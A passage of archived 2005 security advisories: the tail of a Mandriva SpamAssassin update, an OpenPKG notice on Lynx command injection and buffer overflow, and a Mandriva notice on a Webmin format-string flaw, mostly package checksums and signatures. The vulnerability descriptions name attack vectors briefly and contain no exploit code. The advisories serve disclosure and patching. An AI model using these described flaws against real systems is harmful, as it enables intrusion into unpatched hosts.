10.1/SRPMS/spamassassin-3.0.4-0.2.101mdk.src.rpm

 Mandriva Linux 10.1/X86_64:
 18805a860661de486a7ae0a716823da2  
x86_64/10.1/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.101mdk.x86_64.rpm
 3fd255f3e04fc2b4380063a9b4ca7403  
x86_64/10.1/RPMS/spamassassin-3.0.4-0.2.101mdk.x86_64.rpm
 208127aaeb59bb39b9711b4e260fd47c  
x86_64/10.1/RPMS/spamassassin-spamc-3.0.4-0.2.101mdk.x86_64.rpm
 21c05e1003d08a3a9b869971d713c6a7  
x86_64/10.1/RPMS/spamassassin-spamd-3.0.4-0.2.101mdk.x86_64.rpm
 086b1cb83ee2f4343116bbece2b37261  
x86_64/10.1/RPMS/spamassassin-tools-3.0.4-0.2.101mdk.x86_64.rpm
 c605bdcc9ac46522efaeca7e12c80949  
x86_64/10.1/SRPMS/spamassassin-3.0.4-0.2.101mdk.src.rpm

 Mandriva Linux 10.2:
 cc43a9f882ef5a1e20d587d961db8d1a  
10.2/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.102mdk.i586.rpm
 a42113eae2989be9d3af932338535c5d  
10.2/RPMS/spamassassin-3.0.4-0.2.102mdk.i586.rpm
 f294a8ebb83ec6245ee4cb477f01510a  
10.2/RPMS/spamassassin-spamc-3.0.4-0.2.102mdk.i586.rpm
 d017ebbbe4778c147dcc9903473aa092  
10.2/RPMS/spamassassin-spamd-3.0.4-0.2.102mdk.i586.rpm
 bb699d1b5875a53b5daace54ef544d20  
10.2/RPMS/spamassassin-tools-3.0.4-0.2.102mdk.i586.rpm
 eec76ea982c797aaa1b18f6b1c35471c  
10.2/SRPMS/spamassassin-3.0.4-0.2.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 dccacca323368a74af5af12392e1486c  
x86_64/10.2/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.102mdk.x86_64.rpm
 d104a1c344b1616a881e29e8b4cb495c  
x86_64/10.2/RPMS/spamassassin-3.0.4-0.2.102mdk.x86_64.rpm
 410ce462bf261c2e1c73cff6eefa4517  
x86_64/10.2/RPMS/spamassassin-spamc-3.0.4-0.2.102mdk.x86_64.rpm
 b8c5daaf23e58bcf8d344178a6d28b72  
x86_64/10.2/RPMS/spamassassin-spamd-3.0.4-0.2.102mdk.x86_64.rpm
 04bf196106dfc274c726e9be8bf293ce  
x86_64/10.2/RPMS/spamassassin-tools-3.0.4-0.2.102mdk.x86_64.rpm
 eec76ea982c797aaa1b18f6b1c35471c  
x86_64/10.2/SRPMS/spamassassin-3.0.4-0.2.102mdk.src.rpm

 Mandriva Linux 2006.0:
 a4f918d6bf1ca8fedc56537d17a63269  
2006.0/RPMS/perl-Mail-SpamAssassin-3.0.4-3.2.20060mdk.i586.rpm
 51c25677480258fb2d314bafb0f9dfa8  
2006.0/RPMS/spamassassin-3.0.4-3.2.20060mdk.i586.rpm
 b30bf3189682f28947ede6cc32c23cfe  
2006.0/RPMS/spamassassin-spamc-3.0.4-3.2.20060mdk.i586.rpm
 af129cafa8c0afacf47848248e2a093f  
2006.0/RPMS/spamassassin-spamd-3.0.4-3.2.20060mdk.i586.rpm
 e5c6baedbbb98c975cfdbcfbddf50940  
2006.0/RPMS/spamassassin-tools-3.0.4-3.2.20060mdk.i586.rpm
 4b6ae867e1bcfc10a29fc13b04d9a1a6  
2006.0/SRPMS/spamassassin-3.0.4-3.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 d76d8b497ef31d06b89a3ff3a6c1fbd9  
x86_64/2006.0/RPMS/perl-Mail-SpamAssassin-3.0.4-3.2.20060mdk.x86_64.rpm
 29b0e1af99bc43c46c3d53b4c9e1ca1d  
x86_64/2006.0/RPMS/spamassassin-3.0.4-3.2.20060mdk.x86_64.rpm
 f8239556e3a60e290a51d70ccdc3fc48  
x86_64/2006.0/RPMS/spamassassin-spamc-3.0.4-3.2.20060mdk.x86_64.rpm
 0f2ac7444f0878e2c6d001d8c52a6bfd  
x86_64/2006.0/RPMS/spamassassin-spamd-3.0.4-3.2.20060mdk.x86_64.rpm
 d6770761031d62efcd536f0d087a0f40  
x86_64/2006.0/RPMS/spamassassin-tools-3.0.4-3.2.20060mdk.x86_64.rpm
 4b6ae867e1bcfc10a29fc13b04d9a1a6  
x86_64/2006.0/SRPMS/spamassassin-3.0.4-3.2.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories 

[OpenPKG-SA-2005.026] OpenPKG Security Advisory (lynx)

[OpenPKG]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html  http://www.openpkg.org
[EMAIL PROTECTED] [EMAIL PROTECTED]
OpenPKG-SA-2005.026  03-Dec-2005


Package: lynx
Vulnerability:   command injection
OpenPKG Specific:no

Affected Releases:   Affected Packages:  Corrected Packages:
OpenPKG CURRENT  <= lynx-2.8.5-20051030  >= lynx-2.8.5.5-20051203
OpenPKG 2.5  <= lynx-2.8.5-2.5.0 >= lynx-2.8.5-2.5.1
OpenPKG 2.4  <= lynx-2.8.5-2.4.0 >= lynx-2.8.5-2.4.1
OpenPKG 2.3  <= lynx-2.8.5-2.3.0 >= lynx-2.8.5-2.3.1

Description:
  According to a iDEFENSE security advisory [0], a command injection
  vulnerability exists in the Lynx [2] WWW textual client. The
  vulnerability could allow attackers to execute arbitrary commands
  with the privileges of the underlying user. The problem specifically
  exists within the feature to execute local "cgi-bin" programs via the
  "lynxcgi:" URI handler. The Common Vulnerabilities and Exposures (CVE)
  project assigned the id CVE-2005-2929 [3] to the problem.

  Additionally, according to a security advisory from Ulf Harnhammar
  [1], a stack-based buffer overflow in the "HTrjis" function in Lynx
  allows remote NNTP servers to execute arbitrary code via certain
  article headers containing Asian characters that cause Lynx to
  add extra escape (ESC) characters. The Common Vulnerabilities and
  Exposures (CVE) project assigned the id CVE-2005-3120 [4] to the
  problem.


References:
  [0] http://www.idefense.com/application/poi/display?id=338 
  [1] 
http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
  [2] http://lynx.isc.org/
  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2929
  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120


For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.


-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFDkaokgHWT4GPEy58RAnurAJ9k6+9V7BtgDG6PmJ4FXgV8+urLYQCgueUG
XQSysqWKUgxnq/NW+k/BQ3A=
=x+XU
-END PGP SIGNATURE-

MDKSA-2005:223 - Updated webmin package fixes format string vulnerability

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:223
 http://www.mandriva.com/security/
 ___
 
 Package : webmin
 Date: December 2, 2005
 Affected: 10.1, 10.2, 2006.0, Corporate 2.1, Corporate 3.0
 ___
 
 Problem Description:
 
 Jack Louis discovered a format string vulnerability in miniserv.pl 
 Perl web server in Webmin before 1.250 and Usermin before 1.180, 
 with syslog logging enabled. This can allow remote attackers to cause 
 a denial of service (crash or memory consumption) and possibly execute 
 arbitrary code via format string specifiers in the username parameter 
 to the login form, which is ultimately used in a syslog call.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3912
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.1:
 1c75e57f72de9b9eb187d18de15d9a0b  10.1/RPMS/webmin-1.150-3.2.101mdk.noarch.rpm
 fb3f30131577c5e7e799ee58264055aa  10.1/SRPMS/webmin-1.150-3.2.101mdk.src.rpm

 Mandriva Linux 10.1/X86_64:
 39782b6c2fe898596023ad384cd2d5ce  
x86_64/10.1/RPMS/webmin-1.150-3.2.101mdk.noarch.rpm
 fb3f30131577c5e7e799ee58264055aa  
x86_64/10.1/SRPMS/webmin-1.150-3.2.101mdk.src.rpm

 Mandriva Linux 10.2:
 5ff784b1c60b7cc2fbc39487c22b6b78  10.2/RPMS/webmin-1.180-1.2.102mdk.noarch.rpm
 060c31856652e82003997150f9403021  10.2/SRPMS/webmin-1.180-1.2.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 a268a1aa09cf68c7727aa7f0f479c8ac  
x86_64/10.2/RPMS/webmin-1.180-1.2.102mdk.noarch.rpm
 060c31856652e82003997150f9403021  
x86_64/10.2/SRPMS/webmin-1.180-1.2.102mdk.src.rpm

 Mandriva Linux 2006.0:
 25b784d8c69c42f5f816272f47528156  
2006.0/RPMS/webmin-1.220-9.2.20060mdk.noarch.rpm
 64772a0268b55e2d2650f4c43f4fe0b2  
2006.0/SRPMS/webmin-1.220-9.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 bab0f651f140671b4bb01f65b9799de9  
x86_64/2006.0/RPMS/webmin-1.220-9.2.20060mdk.noarch.rpm
 64772a0268b55e2d2650f4c43f4fe0b2  
x86_64/2006.0/SRPMS/webmin-1.220-9.2.20060mdk.src.rpm

 Corporate Server 2.1:
 303bd86b1156ea7ff6d08654fe824707  
corporate/2.1/RPMS/webmin-0.990-6.6.C21mdk.noarch.rpm
 0141850dc79c0ef041bd077264213dc9  
corporate/2.1/SRPMS/webmin-0.990-6.6.C21mdk.src.rpm

 Corporate Server 2.1/X86_64:
 8bb1b1dd0afea4178626fd6d8470b730  
x86_64/corporate/2.1/RPMS/webmin-0.990-6.6.C21mdk.noarch.rpm
 0141850dc79c0ef041bd077264213dc9  
x86_64/corporate/2.1/SRPMS/webmin-0.990-6.6.C21mdk.src.rpm

 Corporate 3.0:
 5826c5c5fea5793c594d4fa46cae6338  
corporate/3.0/RPMS/webmin-1.121-4.5.C30mdk.noarch.rpm
 d38cdd7a15e0340ca4e5aa95e8a5b5ec  
corporate/3.0/SRPMS/webmin-1.121-4.5.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 abd80f852fa1c5628da3613623a1f1c1  
x86_64/corporate/3.0/RPMS/webmin-1.121-4.5.C30mdk.noarch.rpm
 d38cdd7a15e0340ca4e5aa95e8a5b5ec  
x86_64/corporate/3.0/SRPMS/webmin-1.121-4.5.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDkKSNmqjQ0CJFipgRAv02AJ9jK/zjwWYPUmxU+eLOPHfHcknTDgCg1wxA
OjWMSwu8XOcyXiJlYfhP3eI=
=fmDq
-END PGP SIGNATURE-